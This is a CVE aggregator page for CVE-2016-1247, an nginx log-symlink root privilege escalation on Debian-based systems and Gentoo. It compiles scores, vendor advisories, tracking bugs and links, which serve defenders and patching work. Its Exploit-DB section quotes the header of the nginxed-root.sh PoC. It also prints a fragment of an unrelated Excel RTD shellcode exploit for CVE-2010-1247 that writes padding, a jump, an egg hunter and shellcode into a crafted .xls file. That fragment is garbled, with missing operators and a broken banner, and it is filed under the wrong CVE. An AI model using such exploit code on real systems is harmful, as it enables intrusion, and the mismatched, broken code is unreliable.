CVE-2016-1247
published 2016-11-29CVE-2016-1247: The nginx package before 1.6.2-5+deb8u3 on Debian jessie, the nginx packages before 1.4.6-1ubuntu3.6 on Ubuntu 14.04 LTS, before 1.10.0-0ubuntu0.16.04.3 on…
PriorityP351high7.8CVSS 3.1
AVLACLPRLUINSUCHIHAH
EXPLOIT
EPSS
4.86%
91.1th percentile
The nginx package before 1.6.2-5+deb8u3 on Debian jessie, the nginx packages before 1.4.6-1ubuntu3.6 on Ubuntu 14.04 LTS, before 1.10.0-0ubuntu0.16.04.3 on Ubuntu 16.04 LTS, and before 1.10.1-0ubuntu1.1 on Ubuntu 16.10, and the nginx ebuild before 1.10.2-r3 on Gentoo allow local users with access to the web server user account to gain root privileges via a symlink attack on the error log.
Affected
12 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | nginx | < nginx 1.10.2-1 (bookworm) | nginx 1.10.2-1 (bookworm) |
| f5 | nginx | <= 1.10.1 | — |
| f5 | nginx | <= 1.10.0 | — |
| f5 | nginx | <= 1.6.2 | — |
| f5 | nginx | <= 1.4.3 | — |
| f5 | nginx | >= 0 < 1.10.2-1 | 1.10.2-1 |
| f5 | nginx | >= 0 < 1.10.2-1 | 1.10.2-1 |
| f5 | nginx | >= 0 < 1.10.2-1 | 1.10.2-1 |
| f5 | nginx | >= 0 < 1.10.2-1 | 1.10.2-1 |
| fedoraproject | fedora | — | — |
| fedoraproject | fedora | — | — |
| fedoraproject | fedora | — | — |
CVSS provenance
nvdv3.17.8HIGHCVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
osv7.8HIGH
vendor_debian7.8HIGH
vendor_redhat7.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ubuntu
nginx vulnerability
vendor_ubuntu·2016-10-25
CVE-2016-1247 nginx vulnerability
Title: nginx vulnerability
Summary: The system could be made to run programs as an administrator.
Dawid Golunski discovered that the nginx package incorrectly handled log
file permissions. A remote attacker could possibly use this issue to obtain
root privileges.
Instructions: In general, a standard system update will make all the necessary changes.
Red Hat
nginx: Local privilege escalation via log files
vendor_redhat·2016-10-25·CVSS 7.8
CVE-2016-1247 [HIGH] nginx: Local privilege escalation via log files
nginx: Local privilege escalation via log files
The nginx package before 1.6.2-5+deb8u3 on Debian jessie, the nginx packages before 1.4.6-1ubuntu3.6 on Ubuntu 14.04 LTS, before 1.10.0-0ubuntu0.16.04.3 on Ubuntu 16.04 LTS, and before 1.10.1-0ubuntu1.1 on Ubuntu 16.10, and the nginx ebuild before 1.10.2-r3 on Gentoo allow local users with access to the web server user account to gain root privileges via a symlink attack on the error log.
A vulnerability was discovered in nginx. An attacker who could already run commands under the nginx user id could use this access to append data to files owned by root, potentially elevating their own privileges to root.
Statement: Red Hat Product Security has rated this issue as having Low security impact. This issue is not currently planned to be addres
Debian
CVE-2016-1247: nginx - The nginx package before 1.6.2-5+deb8u3 on Debian jessie, the nginx packages bef...
vendor_debian·2016·CVSS 7.8
CVE-2016-1247 [HIGH] CVE-2016-1247: nginx - The nginx package before 1.6.2-5+deb8u3 on Debian jessie, the nginx packages bef...
The nginx package before 1.6.2-5+deb8u3 on Debian jessie, the nginx packages before 1.4.6-1ubuntu3.6 on Ubuntu 14.04 LTS, before 1.10.0-0ubuntu0.16.04.3 on Ubuntu 16.04 LTS, and before 1.10.1-0ubuntu1.1 on Ubuntu 16.10, and the nginx ebuild before 1.10.2-r3 on Gentoo allow local users with access to the web server user account to gain root privileges via a symlink attack on the error log.
Scope: local
bookworm: resolved (fixed in 1.10.2-1)
bullseye: resolved (fixed in 1.10.2-1)
forky: resolved (fixed in 1.10.2-1)
sid: resolved (fixed in 1.10.2-1)
trixie: resolved (fixed in 1.10.2-1)
GHSA
GHSA-4333-xxh4-gh9f: The nginx package before 1
ghsa_unreviewed·2022-05-13
CVE-2016-1247 [HIGH] CWE-59 GHSA-4333-xxh4-gh9f: The nginx package before 1
The nginx package before 1.6.2-5+deb8u3 on Debian jessie, the nginx packages before 1.4.6-1ubuntu3.6 on Ubuntu 14.04 LTS, before 1.10.0-0ubuntu0.16.04.3 on Ubuntu 16.04 LTS, and before 1.10.1-0ubuntu1.1 on Ubuntu 16.10, and the nginx ebuild before 1.10.2-r3 on Gentoo allow local users with access to the web server user account to gain root privileges via a symlink attack on the error log.
OSV
CVE-2016-1247: The nginx package before 1
osv·2016-11-29·CVSS 7.8
CVE-2016-1247 [HIGH] CVE-2016-1247: The nginx package before 1
The nginx package before 1.6.2-5+deb8u3 on Debian jessie, the nginx packages before 1.4.6-1ubuntu3.6 on Ubuntu 14.04 LTS, before 1.10.0-0ubuntu0.16.04.3 on Ubuntu 16.04 LTS, and before 1.10.1-0ubuntu1.1 on Ubuntu 16.10, and the nginx ebuild before 1.10.2-r3 on Gentoo allow local users with access to the web server user account to gain root privileges via a symlink attack on the error log.
No detection rules found.
Exploit-DB
Nginx (Debian Based Distros + Gentoo) - 'logrotate' Local Privilege Escalation
exploitdb·2016-11-16·CVSS 7.8
CVE-2016-1247 [HIGH] Nginx (Debian Based Distros + Gentoo) - 'logrotate' Local Privilege Escalation
Nginx (Debian Based Distros + Gentoo) - 'logrotate' Local Privilege Escalation
---
#!/bin/bash
#
# Nginx (Debian-based distros + Gentoo) - Root Privilege Escalation PoC Exploit
# nginxed-root.sh (ver. 1.0)
#
# CVE-2016-1247
#
# Discovered and coded by:
#
# Dawid Golunski
# dawid[at]legalhackers.com
#
# https://legalhackers.com
#
# Follow https://twitter.com/dawid_golunski for updates on this advisory.
#
# ---
# This PoC exploit allows local attackers on Debian-based systems (Debian, Ubuntu
# as well as Gentoo etc.) to escalate their privileges from nginx web server user
# (www-data) to root through unsafe error log handling.
#
# The exploit waits for Nginx server to be restarted or receive a USR1 signal.
# On Debian-based systems the USR1 signal is sent by logrotate (/etc/logrotate.d/ngi
Exploit-DB
Excel RTD - Memory Corruption
exploitdb·2010-09-10·CVSS 9.3
CVE-2010-1247 [CRITICAL] Excel RTD - Memory Corruption
Excel RTD - Memory Corruption
---
'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ 266:
print "[*] Error : Shellcode length is long"
return
if len(eggHunter) 0 :
eggHunter += '\x90'
dif = dif - 1
if len(shellcode) > 800:
print "[*] Error : Shellcode length is long"
return
if len(shellcode) 0 :
shellcode += '\x90'
dif = dif - 1
fdW= open('exploit.xls', 'wb+')
fdW.write(str1)
fdW.write("\x41\x41\x41") # padding
fdW.write(jmp)
fdW.write(eggHunter)
fdW.write("\xeb\x06\x41\x41")
fdW.write(eip)
fdW.write("\x81\xc4\x24\x16\x00\x00") # add esp,2016
fdW.write("\xc3") #ret
i = 0
while i < 54 :
fdW.write("\x41\x41\x41\x41") # padding
i = i + 1
fdW.write(str2)
fdW.write(shellcode)
fdW.write(str3)
fdW.close()
fdR.close()
print '[-
Bugzilla
CVE-2016-1247 nginx: Local privilege escalation via log files [fedora-all]
bugzilla·2016-10-31·CVSS 7.8
CVE-2016-1247 [HIGH] CVE-2016-1247 nginx: Local privilege escalation via log files [fedora-all]
CVE-2016-1247 nginx: Local privilege escalation via log files [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supported versions of Fed
Bugzilla
CVE-2016-1247 nginx: Local privilege escalation via log files
bugzilla·2016-10-31·CVSS 7.8
CVE-2016-1247 [HIGH] CVE-2016-1247 nginx: Local privilege escalation via log files
CVE-2016-1247 nginx: Local privilege escalation via log files
It was reported that the nginx web server packages in Debian suffered from a > privilege escalation vulnerability (www-data to root) due to the way log files > are handled.
Debian bug report:
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=842295
Discussion:
Created nginx tracking bugs for this issue:
Affects: fedora-all [bug 1390183]
Affects: epel-all [bug 1390184]
---
Default SELinux policies on RHEL and Fedora protect against this flaw by limiting the files nginx's (uid 0) logging process can write to (httpd_log_t).
Only systems running with `setenforce 0` or running nginx unconfined are vulnerable to privilege escalation.
With SELinux enforcing, it may still be possible for an attacker to redirect nginx's access.
Bugzilla
CVE-2016-1247 nginx: Local privilege escalation via log files [epel-all]
bugzilla·2016-10-31·CVSS 7.8
CVE-2016-1247 [HIGH] CVE-2016-1247 nginx: Local privilege escalation via log files [epel-all]
CVE-2016-1247 nginx: Local privilege escalation via log files [epel-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora EPEL.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supported versions of
http://packetstormsecurity.com/files/139750/Nginx-Debian-Based-Distros-Root-Privilege-Escalation.htmlhttp://seclists.org/fulldisclosure/2016/Nov/78http://seclists.org/fulldisclosure/2017/Jan/33http://www.debian.org/security/2016/dsa-3701http://www.securityfocus.com/archive/1/539796/100/0/threadedhttp://www.securityfocus.com/bid/93903http://www.securitytracker.com/id/1037104http://www.ubuntu.com/usn/USN-3114-1https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.htmlhttps://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CBIZEKHBOCKO7FUMCO4X53ENMWU5OYFX/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ESTIADC7BDB6VTH4JAP6C6OCW2CQ4NHP/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/P3WOO7E5R2HT5XVOIOFPEFALILVOWZUF/https://security.gentoo.org/glsa/201701-22https://www.exploit-db.com/exploits/40768/https://www.youtube.com/watch?v=aTswN1k1fQshttp://packetstormsecurity.com/files/139750/Nginx-Debian-Based-Distros-Root-Privilege-Escalation.htmlhttp://seclists.org/fulldisclosure/2016/Nov/78http://seclists.org/fulldisclosure/2017/Jan/33http://www.debian.org/security/2016/dsa-3701http://www.securityfocus.com/archive/1/539796/100/0/threadedhttp://www.securityfocus.com/bid/93903http://www.securitytracker.com/id/1037104http://www.ubuntu.com/usn/USN-3114-1https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.htmlhttps://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CBIZEKHBOCKO7FUMCO4X53ENMWU5OYFX/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ESTIADC7BDB6VTH4JAP6C6OCW2CQ4NHP/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/P3WOO7E5R2HT5XVOIOFPEFALILVOWZUF/https://security.gentoo.org/glsa/201701-22https://www.exploit-db.com/exploits/40768/https://www.youtube.com/watch?v=aTswN1k1fQs
2016-11-29
Published